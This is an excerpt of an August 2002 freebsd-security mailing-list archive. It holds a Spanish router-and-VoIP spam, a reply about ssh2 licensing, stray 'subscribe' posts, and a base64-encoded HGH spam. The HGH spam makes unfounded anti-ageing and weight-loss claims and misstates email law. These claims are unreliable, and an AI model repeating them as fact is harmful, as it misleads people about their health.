X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------_NextPart_311434118387611 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: QUOTED-PRINTABLE =A1Nuevo Ruteador Linksys con Net2Phone! Ahora podr=E1 disfrutar de las grandes ventajas de un ruteador Linksys m=E1s la posibilidad de hacer llamadas telef=F3nicas a trav=E9s de =E9l con Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales. Si ya cuenta con el servicio ADSL o bien conocido como Prodigy Infinitum de Telmex, el Ruteador Linksys EtherFast Cable/DSL es la opci=F3n perfecta para que m=FAltiples computadoras dentro de su red naveguen el Internet a una gran velocidad, permitiendo conectar hasta 253 usuarios. Con su tecnolog=EDa de ruteo, la navegaci=F3n ser=E1 mucho m=E1s eficiente y mucho m=E1s r=E1pida que por el m=E9todo convencional de compartir el Internet a trav=E9s de software. =A1GARANTIZADO! Si a=FAn no cuenta con el servicio de Prodigy Infinitum visite: http://www.telmex.com/internos/infinitum/info/ Sus funciones incluyen: Tecnolog=EDa NAT que act=FAa como un firewall para proteger su red interna contra hackers y usuarios no autorizados. El administrador puede bloquear usuarios internos espec=EDficos, filtrando servicios permitidos para Internet. Act=FAa como servidor DHCP para su red existente. Ruteo de puertos para direccionar peticiones externas a una computadora interna especifica dentro de su red. y muchas funciones m=E1s! Y ahora con el nuevo equipo Linksys Router + VOICE de Net2Phone Es tan sencillo como conectar un tel=E9fono ordinario a la parte posterior del ruteador y sus llamadas ser=E1n enrutadas por Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales. No requiere de tener su computadora prendida para efectuar llamadas, y puede agregar su l=EDnea telef=F3nica de Net2Phone a su conmutador telef=F3nico. Visite esta p=E1gina para adquirir el ruteador Linksys http://www.netsolutions.com.mx/servicios/ADSL/adsl.shtml Si desea conocer las tarifas de net2Phone d=E9 click aqu=ED Net Solutions Tel: +52(55)5148-9888 Fax: +52(55)5148-9895 E-mail: info@netsolutions.com.mx http://www.netsolutions.com.mx Para ser removido de la lista da click aqu=ED. ------_NextPart_311434118387611 Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: QUOTED-PRINTABLE

 3D""=A1Nuevo Ruteador Linksys con Net2Phone!

Ahora podr=E1 disfrutar de las grandes ventajas de un ruteador Linksys m=E1s la posibilidad de hacer llamadas telef=F3nicas a trav=E9s de =E9l con Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales.

Si ya cuenta con el servicio ADSL o bien conocido como Prodigy Infinitum de Telmex, el Ruteador Linksys EtherFast Cable/DSL es la opci=F3n perfecta para que m=FAltiples computadoras dentro de su red naveguen el Internet a una gran velocidad, permitiendo conectar hasta 253 usuarios.

Con su tecnolog=EDa de ruteo, la navegaci=F3n ser=E1 mucho m=E1s eficiente y mucho m=E1s r=E1pida que por el m=E9todo convencional de compartir el Internet a trav=E9s de software. =A1GARANTIZADO!

Si a=FAn no cuenta con el servicio de Prodigy Infinitum visite:
http://www.telmex.com/internos/infinitum/info/

Sus funciones incluyen:

  • Tecnolog=EDa NAT que act=FAa como un firewall para proteger su red interna contra hackers y usuarios no autorizados.
  • El administrador puede bloquear usuarios internos espec=EDficos, filtrando servicios permitidos para Internet.
  • Act=FAa como servidor DHCP para su red existente.
  • Ruteo de puertos para direccionar peticiones externas a una computadora interna especifica dentro de su red.
  • y muchas funciones m=E1s!

3D""Y ahora con el nuevo equipo Linksys Router + VOICE de Net2Phone

  • Es tan sencillo como conectar un tel=E9fono ordinario a la parte posterior del ruteador y sus llamadas ser=E1n enrutadas por Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales.
  • No requiere de tener su computadora prendida para efectuar llamadas, y puede agregar su l=EDnea telef=F3nica de Net2Phone a su conmutador telef=F3nico.

Visite esta p=E1gina para adquirir el ruteador Linksys
http://www.netsolutions.com.mx/servicios/ADSL/adsl.shtml

Si desea conocer las tarifas de net2Phone d=E9 click aqu=ED


Net Solutions
Tel: +52(55)5148-9888
Fax: +52(55)5148-9895
E-mail: info@netsolutions.com.mx
http://www.netsolutions.com.mx

 

Para ser removido de la lista da click aqu=ED.

------_NextPart_311434118387611-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 20 5:54:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 38C8D37B400 for ; Tue, 20 Aug 2002 05:54:56 -0700 (PDT) Received: from trillian.santala.org (ip212-226-173-33.adsl.kpnqwest.fi [212.226.173.33]) by mx1.FreeBSD.org (Postfix) with SMTP id C827643E42 for ; Tue, 20 Aug 2002 05:54:54 -0700 (PDT) (envelope-from jake@iki.fi) Received: (qmail 2550 invoked by uid 11053); 20 Aug 2002 12:54:52 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 20 Aug 2002 12:54:52 -0000 Date: Tue, 20 Aug 2002 15:54:52 +0300 (EEST) From: Jarkko Santala X-X-Sender: jake@trillian.santala.org To: Wincent Colaiuta Cc: Philip Paeps , Subject: Re: Chroot environment for ssh In-Reply-To: <31BC65C5-B3C8-11D6-9471-003065C60B4C@mac.com> Message-ID: <20020820154953.A456-100000@trillian.santala.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Aug 2002, Wincent Colaiuta wrote: > if we're not careful, we end up giving them a login shell. Using ssh2 > from the ports gets around this limitation, but just check the licence > before you install to make sure that you qualify (otherwise it's not > free). I guess _nobody_ actually _reads_ the LICENSE, since it clearly states that the version of ssh2 in question is free for _any_ use (commercial or not) on free UNIX platforms including FreeBSD. The important part of the LICENSE file is here: --cut-- To qualify for a Non-Commercial Version License, You must: (1) use the Software solely on a system under the Linux, FreeBSD, NetBSD, or OpenBSD operating system (whether for commercial or non-commercial use), or (2) use the Software for non-commercial purposes as defined herein and be a Non-Commercial Entity as defined herein, or (3) be an University User as defined herein, or (4) be an Excluded Contractor as defined herein. --cut-- Notice the use of the word "or". I do recommend everyone reads the LICENSE themselves in full, since I am not a lawyer and anything I say, have said or will say should not be taken as legal advice in and/or under any circumstances no matter what they are, where they are, where am I and/or who am I. -jake -- Jarkko Santala http://www.iki.fi/~jake/ System Administrator 2001:670:83:f08::/64 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 20 18:22:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4D20937B400 for ; Tue, 20 Aug 2002 18:22:43 -0700 (PDT) Received: from web12806.mail.yahoo.com (web12806.mail.yahoo.com [216.136.174.41]) by mx1.FreeBSD.org (Postfix) with SMTP id 2513B43E72 for ; Tue, 20 Aug 2002 18:22:43 -0700 (PDT) (envelope-from zaunere@yahoo.com) Message-ID: <20020821012242.87586.qmail@web12806.mail.yahoo.com> Received: from [66.114.70.134] by web12806.mail.yahoo.com via HTTP; Tue, 20 Aug 2002 18:22:42 PDT Date: Tue, 20 Aug 2002 18:22:42 -0700 (PDT) From: Hans Zaunere To: FreeBSD-security@FreeBSD.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org subscribe __________________________________________________ Do You Yahoo!? HotJobs - Search Thousands of New Jobs http://www.hotjobs.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 20 18:31:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8881137B400 for ; Tue, 20 Aug 2002 18:31:22 -0700 (PDT) Received: from web12803.mail.yahoo.com (web12803.mail.yahoo.com [216.136.174.38]) by mx1.FreeBSD.org (Postfix) with SMTP id 5EE2543E42 for ; Tue, 20 Aug 2002 18:31:22 -0700 (PDT) (envelope-from zaunere@yahoo.com) Message-ID: <20020821012442.39288.qmail@web12803.mail.yahoo.com> Received: from [66.114.70.134] by web12803.mail.yahoo.com via HTTP; Tue, 20 Aug 2002 18:24:42 PDT Date: Tue, 20 Aug 2002 18:24:42 -0700 (PDT) From: Hans Zaunere Subject: subscribe To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org subscribe __________________________________________________ Do You Yahoo!? HotJobs - Search Thousands of New Jobs http://www.hotjobs.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 21 1:30:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6848337B400; Wed, 21 Aug 2002 01:30:40 -0700 (PDT) Received: from desertmail.com (via-lan-200.33-165-194.amis.com.mx [200.33.165.194]) by mx1.FreeBSD.org (Postfix) with SMTP id 68C4243E3B; Wed, 21 Aug 2002 01:30:31 -0700 (PDT) (envelope-from Grow_Younger7154y75@desertmail.com) Received: from [152.250.248.164] by smtp4.cyberecschange.com with NNFMP; Wed, 21 Aug 0102 14:29:08 -0600 Reply-To: "Yes" Message-ID: <002b40d84a8a$1226d1b0$7cc17eb5@eljskc> From: "Yes" To: , , Subject: Do you know the three HGH products? Date: Tue, 20 Aug 0102 23:20:20 +0900 MiME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00E3_40B64D3A.E2054E75" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_00E3_40B64D3A.E2054E75 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: base64 TXl0aCBhYm91dCBIR0ggcHJvZHVjdHMNCg0KPGh0bWw+DQoNCjxoZWFkPg0K DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRl eHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPg0KDQo8bWV0YSBuYW1l PSJHRU5FUkFUT1IiIGNvbnRlbnQ9Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4w Ij4NCg0KPG1ldGEgbmFtZT0iUHJvZ0lkIiBjb250ZW50PSJGcm9udFBhZ2Uu RWRpdG9yLkRvY3VtZW50Ij4NCg0KPHRpdGxlPlRoZXJlIGFyZSB0aHJlZSBk aWZmZXJlbnQgdHlwZXMgb2YgSEdIIHByb2R1Y3RzPC90aXRsZT4NCg0KPC9o ZWFkPg0KDQo8Ym9keSBiYWNrZ3JvdW5kPSJjbG91ZHMuanBnIj4NCg0KPHA+ PGZvbnQgc2l6ZT0iNCI+PGZvbnQgY29sb3I9IiM4MDAwMDAiPjxiPlRoZXJl IGFyZSB0aHJlZSBkaWZmZXJlbnQgdHlwZXMgb2YNCg0KSEdIIHByb2R1Y3Rz LjwvYj48L2ZvbnQ+PGJyPg0KDQpUaGUgY29uZnVzaW9uIGlzIHRoYXQgYWxs IHRocmVlIGFyZTxicj4NCg0KYWR2ZXJ0aXNlZCBhcyBpZiB0aGV5IHdlcmUg dGhlIHNhbWUuPC9mb250Pjxicj4NCg0KJm5ic3A7PGJyPg0KDQombmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgPHU+VGhlIHRo cmVlIHR5cGVzIGFyZTo8L3U+PGJyPg0KDQombmJzcDs8YnI+DQoNCjxiPjEp PC9iPiAtLS0gPGZvbnQgY29sb3I9IiMwMDAwRkYiPjxiPkhvbWVvcGF0aGlj IEhHSDwvYj48L2ZvbnQ+PGJyPg0KDQo8Yj4yKTwvYj4gLS0tIDxmb250IGNv bG9yPSIjMDAwMEZGIj48Yj5QcmUtY3Vyc29yIEhHSDwvYj48L2ZvbnQ+PGJy Pg0KDQo8Yj4zKTwvYj4gLS0tIDxmb250IGNvbG9yPSIjMDAwMEZGIj48Yj5S ZWFsIG9yIHN5bnRoZXRpYyBIR0g8L2I+PC9mb250Pg0KDQooZGVsaXZlcmVk IGJ5IGluamVjdGlvbjxicj4NCg0KJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7 Jm5ic3A7Jm5ic3A7Jm5ic3A7IG9yLCBieSBhbiBvcmFsIHNwcmF5IG1ldGhv ZCkuPGJyPg0KDQombmJzcDs8YnI+DQoNCkRvIHlvdSBrbm93IGRpZmZlcmVu Y2VzPzxicj4NCg0KJm5ic3A7PGJyPg0KDQpDYWxsIHVzIGFuZCB3ZSdsbCBl eHBsYWluIHRoZW0gdG8geW91Ljxicj4NCg0KJm5ic3A7PGJyPg0KDQpPdXIg dG9sbCBmcmVlIG51bWJlciBpcyA8Zm9udCBjb2xvcj0iIzAwMDA4MCI+PGI+ MS04ODgtNjIxLTczMDA8L2I+PC9mb250Pjxicj4NCg0KQW4gSEdIIHN0YWZm IG1lbWJlciBpcyBhdmFpbGFibGU8YnI+DQoNCjkgdG8gNSBQYWNpZmljIFRp bWUuPGJyPg0KDQpJZiBhZnRlciBob3VycywgcGxlYXNlIGxlYXZlIHlvdSBu YW1lPGJyPg0KDQphbmQgZGF5IGFuZCBldmVuaW5nIHBob25lIG51bWJlcnMu PGJyPg0KDQpXZSB3aWxsIGNhbGwgeW91IGJhY2sgaW4gYSBubyBwcmVzc3Vy ZSw8YnI+DQoNCmVkdWNhdGlvbmFsIG1hbm5lci48YnI+DQoNCklmIHlvdSBh cmUgb3ZlcnNlYXMgY2FsbCB5b3VyIGxvbmcgZGlzdGFuY2U8YnI+DQoNCm9w ZXJhdG9yIGFuZCBhc2sgdG8gYmUgY29ubmVjdGVkIHRvIG91cjxicj4NCg0K cGhvbmUgbnVtYmVyLiZuYnNwOyBXZSB3aWxsIGNhbGwgeW91IGJhY2sgc288 YnI+DQoNCndlIGNhbiBwYXkgZm9yIHRoZSBsb25nIGRpc3RhbmNlIGNoYXJn ZXMuPGJyPg0KDQombmJzcDs8YnI+DQoNCjxmb250IGNvbG9yPSIjRkYwMDAw Ij5Gb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBIR0ggcmVhZCBvbi4uLi4uLi4u Li4uLjwvZm9udD48YnI+DQoNCiZuYnNwOzxicj4NCg0KSEFWRSBZT1UgSEVB UkQgT0Y8YnI+DQoNCkhVTUFOIEdST1dUSCBIT1JNT05FIChIR0gpPz8/PGJy Pg0KDQombmJzcDs8YnI+DQoNCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyBS ZWxlYXNlZCBieSB5b3VyIG93biBwaXR1aXRhcnkgZ2xhbmQsIEhHSCBzdGFy dHMNCg0KZGVjbGluaW5nPGJyPg0KDQppbiB5b3VyIDIwcywgZXZlbiBtb3Jl IGluIHlvdXIgMzBzIGFuZCA0MHMsIGV2ZW50dWFsbHkgcmVzdWx0aW5nPGJy Pg0KDQppbiB0aGUgc2hyaW5rYWdlIG9mIG1ham9yIG9yZ2FucyAtLSBwbHVz LCBhbGw8YnI+DQoNCm90aGVyIHN5bXB0b21zIHJlbGF0ZWQgdG8gb2xkIGFn ZS48YnI+DQoNCiZuYnNwOzxicj4NCg0KJm5ic3A7PGJyPg0KDQpJTiBUSE9V U0FORFMgT0YgQ0xJTklDQUwgU1RVRElFUyw8YnI+DQoNCkhHSCBIQVMgQkVF TiBTSE9XTiBUTyBBQ0NPTVBMSVNIIFRIRSBGT0xMT1dJTkc6PGJyPg0KDQom bmJzcDs8YnI+DQoNCiogUmVkdWNlIEJvZHkgRmF0IGFuZCBCdWlsZCBMZWFu IE11c2NsZTxicj4NCg0KJm5ic3A7Jm5ic3A7IFdJVEhPVVQgRVhFUkNJU0Uh PGJyPg0KDQombmJzcDs8YnI+DQoNCiogRW5oYW5jZSBTZXh1YWwgUGVyZm9y bWFuY2U8YnI+DQoNCiZuYnNwOzxicj4NCg0KKiBSZW1vdmUgV3JpbmtsZXMg YW5kIENlbGx1bGl0ZTxicj4NCg0KJm5ic3A7PGJyPg0KDQoqIExvd2VyIEJs b29kIFByZXNzdXJlIGFuZCBJbXByb3ZlIENob2xlc3Rlcm9sIFByb2ZpbGU8 YnI+DQoNCiZuYnNwOzxicj4NCg0KKiBJbXByb3ZlIFNsZWVwLCBWaXNpb24g YW5kIE1lbW9yeTxicj4NCg0KJm5ic3A7PGJyPg0KDQoqIFJlc3RvcmUgSGFp ciBDb2xvciBhbmQgR3Jvd3RoPGJyPg0KDQombmJzcDs8YnI+DQoNCiogU3Ry ZW5ndGhlbiB0aGUgSW1tdW5lIFN5c3RlbTxicj4NCg0KJm5ic3A7PGJyPg0K DQoqIEluY3JlYXNlIEVuZXJneSBhbmQgQ2FyZGlhYyBPdXRwdXQ8YnI+DQoN CiZuYnNwOzxicj4NCg0KKiBUdXJuIGJhY2sgeW91ciBib2R5J3MgQmlvbG9n aWNhbCBUaW1lIENsb2NrIDEwIC0gMjAgeWVhcnM8YnI+DQoNCiZuYnNwOzxi cj4NCg0KKiBMaXZlIExvbmdlciBBTkQgU3Ryb25nZXI8YnI+DQoNCiZuYnNw Ozxicj4NCg0KQWxsIG5hdHVyYWwgYW5kIG9yZ2FuaWMgcGxhbnQgYmFzZWQ8 YnI+DQoNCiZuYnNwOzxicj4NCg0KPGZvbnQgY29sb3I9IiMwMDAwRkYiPjxi PkZFRUwgMTAgWUVBUlMgWU9VTkdFUiBXSVRIIE9SQUwgU1BSQVkgSEdILjxi cj4NCg0KR1VBUkFOVEVFRDwvYj48L2ZvbnQ+PGJyPg0KDQombmJzcDs8YnI+ DQoNCiZuYnNwOyZuYnNwOyZuYnNwOyBXZSBhcmUgdGhlIG1hbnVmYWN0dXJl ciBhbmQgd2Ugc2VsbCBkaXJlY3RseSB0byBEb2N0b3JzLDxicj4NCg0KQ2hp cm9wcmFjdG9ycywgYW5kIGNvbnN1bWVycyB3b3JsZCB3aWRlIHRoZSBoaWdo ZXN0IGdyYWRlPGJyPg0KDQombmJzcDtIR0ggT3JhbCBTcHJheSBhdmFpbGFi bGUuJm5ic3A7PGJyPg0KDQombmJzcDs8YnI+DQoNCiZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyBXaXRoIGludGVybmV0IG1hcmtldGluZywgd2UgYXJlIGFi bGUgdG8gc2F2ZQ0KDQphZHZlcnRpc2luZzxicj4NCg0KY29zdCBhbmQgcGFz cyB0aG9zZSBzYXZpbmdzIGFsb25nIHRvIHlvdS48YnI+DQoNCkJ1dCB5b3Ug bXVzdCBhY3Qgbm93LiZuYnNwOzxicj4NCg0KJm5ic3A7PGJyPg0KDQpUbyBy ZWNlaXZlIG1vcmUgaW5mb3JtYXRpb24gY2FsbCZuYnNwOyB1cyBub3cuPGJy Pg0KDQombmJzcDs8YnI+DQoNCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyBUT0xM IEZSRUUgPGI+PGZvbnQgY29sb3I9IiMwMDAwODAiPjEtODg4LTYyMS03MzAw PC9mb250PjwvYj48YnI+DQoNCiZuYnNwOzxicj4NCg0KV2UgbXVzdCBzcGVh ayB0byB5b3UgaW4gcGVyc29uIHRvIHF1YWxpZnkgeW91ciB1c2FnZS48YnI+ DQoNCiZuYnNwOzxicj4NCg0KJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IEFs bCBvZiB5b3VyIHF1ZXN0aW9ucyB3aWxsIGJlIGFkZHJlc3NlZCBhbmQgYW5z d2VyZWQgaW4NCg0KYSBmcmllbmRseSw8YnI+DQoNCm5vIHByZXNzdXJlIG1h bm5lci4mbmJzcDsgT3VyIG1haW4gcHVycG9zZSBpcyB0byBwcm92aWRlIHlv dSB3aXRoPGJyPg0KDQombmJzcDtpbmZvcm1hdGlvbiBzbyB5b3UgY2FuIG1h a2UgYW4gZWR1Y2F0ZWQgZGVjaXNpb24uPGJyPg0KDQombmJzcDs8YnI+DQoN CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyBGb3IgbW9yZSBpbmZvcm1hdGlv biBjYWxsPGJyPg0KDQombmJzcDs8YnI+DQoNCiZuYnNwOyZuYnNwOyZuYnNw OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyA8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCI+MS04ODgtNjIxLTczMDA8 L2ZvbnQ+PC9iPjxicj4NCg0KJm5ic3A7PGJyPg0KDQombmJzcDtJZiB5b3Ug YXJlIG9uIGxpbmUgd3JpdGUgZG93biBvdXI8YnI+DQoNCnBob25lIG51bWJl ciBhbmQgY2FsbCB1cyB3aGVuIHlvdSBjYW4uPGJyPg0KDQombmJzcDs8YnI+ DQoNClNvb24sIHlvdSBhbmQgeW91ciBsb3ZlZCBvbmVzIHdpbGwgYmUgdmVy eSBnbGFkIHlvdSBkaWQuPGJyPg0KDQombmJzcDs8YnI+DQoNClJlYWQgd2hh dCBwZW9wbGUgYXJlIHNheWluZzo8YnI+DQoNCiZuYnNwOzxicj4NCg0KJnF1 b3Q7VGhlIGVmZmVjdHMgb2YgNiBtb250aHMgb2YgR0ggb248YnI+DQoNCmxl YW4gYm9keSBtYXNzIGFuZCBmYXQgd2VyZSBlcXVpdmFsZW50PGJyPg0KDQpp biBtYWduaXR1ZGUgdG8gdGhlIGNoYW5nZXMgaW5jdXJyZWQ8YnI+DQoNCmR1 cmluZyAxMC0yMCB5ZWFycyBvZiBhZ2luZy4mcXVvdDs8YnI+DQoNCkRyLiBE YW5pZWwgUnVkbWFuLCBNRCw8YnI+DQoNCk5ldyBFbmdsYW5kIEpvdXJuYWwg b2YgTWVkaWNpbmUuPGJyPg0KDQombmJzcDs8YnI+DQoNCiZxdW90O1dpdGhp biBmb3VyIG1vbnRocywgbXkgYm9keSBmYXQgZGVjcmVhc2VkPGJyPg0KDQom bmJzcDtmb3JtIDMwJSBkb3duIHRvIDIxJSEgSSBub3RpY2VkIG15IHNraW48 YnI+DQoNCiZuYnNwO2lzIG1vcmUgc3VwcGxlIGFuZCBteSBvdmVyYWxsIG1l bnRhbDxicj4NCg0KJm5ic3A7b3V0bG9vayBpbXByb3ZlZCBzaWduaWZpY2Fu dGx5LiZxdW90Ozxicj4NCg0KJm5ic3A7RC5XLiwgTmV3IEplcnNleTxicj4N Cg0KJm5ic3A7PGJyPg0KDQomcXVvdDtXZSBoYXZlIGJlZW4gb24gdGhlIHNw cmF5IGZvciBqdXN0IDMgd2Vla3M8YnI+DQoNCm5vdywgYW5kIGJlc2lkZXMg dGhlIHRyZW1lbmRvdXMgZW5lcmd5IHdlPGJyPg0KDQpib3RoIGZlZWwsIG15 IGh1c2JhbmRzIGFsbGVyZ2llcyBhbmQgc3BlbGxzPGJyPg0KDQpvZiBkZXBy ZXNzaW9uIGhhdmUgbGlmdGVkLiBJIGFtIGhlYWxpbmc8YnI+DQoNCmV4dHJl bWVseSBmYXN0IGFmdGVyIGFuIGFjY2lkZW50IGFuZCBoYXZlPGJyPg0KDQps b3N0IDcgbGJzLiB3aXRob3V0IHRyeWluZyEmcXVvdDs8YnI+DQoNCkMuQi4s IEZsYWdzdGFmZi4gQVo8YnI+DQoNCiZuYnNwOzxicj4NCg0KVGhhbmtzIGZv ciByZWFkaW5nIG91ciBsZXR0ZXIsPGJyPg0KDQpUaGUgSEdIIFN0YWZmPGJy Pg0KDQpVU0EgRGl2aXNpb248YnI+DQoNCiZuYnNwOzxicj4NCg0KUFM6Jm5i c3A7IFRoZSBIR0ggU3RhZmYgZ3VhcmFudGVlcyB0aGU8YnI+DQoNCmhpZ2hl c3QgcXVhbGl0eSBhbmQgbG93ZXN0IHByaWNlLjxicj4NCg0KJm5ic3A7PGJy Pg0KDQombmJzcDtXZSBtYW51ZmFjdHVyZSBhbmQgc2hpcCBkaXJlY3RseSB0 byB5b3VyIGRvb3IuPGJyPg0KDQombmJzcDs8YnI+DQoNCkNhbGwgdXMgbm93 IDxiPjxmb250IGNvbG9yPSIjMDAwMDgwIj4xLTg4OC02MjEtNzMwMDwvZm9u dD48L2I+PGJyPg0KDQombmJzcDs8YnI+DQoNCj09PT09PT0mbmJzcDsmbmJz cDsgRW5kIG9mIG1lc3NhZ2UgPT09PT09PT0mbmJzcDs8YnI+DQoNCiZuYnNw Ozxicj4NCg0KJm5ic3A7Jm5ic3A7IFRoZSBmb2xsb3dpbmcgc3RhdGVtZW50 IGlzIHByb3ZpZGVkIHRvIGJlPGJyPg0KDQppbiBjb21wbGlhbmNlIHdpdGgg Y29tbWVyY2lhbCBlbWFpbCBsYXdzLjxicj4NCg0KJm5ic3A7PGJyPg0KDQom bmJzcDsmbmJzcDsgSWYgeW91IGRvIG5vdCB3aXNoIHRvIHJlY2VpdmUgZnVy dGhlcjxicj4NCg0KbWFpbGluZ3MsIHBsZWFzZSBjbGljayByZXBseSB0bzog cGxzcmVtaGdoMzRAYnRhbWFpbC5uZXQuY24gIGFuZCB0eXBlIHJlbW92ZSBp biB0aGUgc3ViamVjdCBib3guPGJyPg0KDQpUaGVuIGNsaWNrIHNlbmQuPGJy Pg0KDQombmJzcDs8YnI+DQoNCiZuYnNwOyZuYnNwOyBUaGlzIG1lc3NhZ2Ug aXMgaW4gZnVsbCBjb21wbGlhbmNlIHdpdGg8YnI+DQoNClUuUy4gRmVkZXJh bCByZXF1aXJlbWVudHMgZm9yIGNvbW1lcmNpYWw8YnI+DQoNCmVtYWlsIHVu ZGVyIGJpbGwgUy4xNjE4IFRpdGxlIGxsbCwgU2VjdGlvbiAzMDEsPGJyPg0K DQpQYXJhZ3JhcGggKGEpKDIpKEMpIHBhc3NlZCBieSB0aGUgMTA1dGggVS5T Ljxicj4NCg0KQ29uZ3Jlc3MgYW5kIGlzIG5vdCBjb25zaWRlcmVkIFNQQU08 YnI+DQoNCnNpbmNlIGl0IGluY2x1ZGVzIGEgcmVtb3ZlIG1lY2hhbmlzbS4q PGJyPg0KDQpUaGlzIG1lc3NhZ2UgaXMgbm90IGludGVuZGVkIGZvciByZXNp ZGVudHMgaW4gdGhlPGJyPg0KDQpzdGF0ZXMgb2YgQ0EsIE5DLCBOViwgUkks IFROLCBWQSAmYW1wOyBXQS48YnI+DQoNClNjcmVlbmluZyBvZiBhZGRyZXNz ZXMgaGFzIGJlZW4gZG9uZSB0byB0aGUgYmVzdDxicj4NCg0Kb2Ygb3VyIHRl Y2huaWNhbCBhYmlsaXR5Ljxicj4NCg0KJm5ic3A7PGJyPg0KDQombmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz cDsmbmJzcDsmbmJzcDsmbmJzcDsgQ2FsbCB1cw0KDQpub3cgPGI+PGZvbnQg Y29sb3I9IiMwMDAwODAiPjEtODg4LTYyMS03MzAwPC9mb250PjwvYj4gZm9y IHlvdXI8YnI+DQoNCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyBmcmVl DQoNCkhHSCBjb25zdWx0YXRpb24uPC9wPg0KDQo8cD48YnI+DQoNClRoYW5r IHlvdTwvcD4NCg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQoNCiANCiANCiANCiAN CiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiAN CiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiAN CiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCiANCg0KLS0NCg0KMDc1 OEVPak84LTE5N0dsMTM= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 21 13:21:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 84A5F37B400 for ; Wed, 21 Aug 2002 13:21:45 -0700 (PDT) Received: from mail.libertysurf.net (mail.libertysurf.net [213.36.80.91]) by mx1.FreeBSD.org (Postfix) with ESMTP id 265BF43E65 for ; Wed, 21 Aug 2002 13:21:45 -0700 (PDT) (envelope-from usaforevers@yahoo.fr) Received: from Poste07 (213.19.2.68) by mail.libertysurf.net (6.5.026) id 3D50909B00164874; Wed, 21 Aug 2002 22:20:53 +0200 Message-ID: <4112-22002832120212562@Poste07> To: "10" From: "cathy" Subject: retour de vacances Date: Wed, 21 Aug 2002 22:21:02 +0200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) 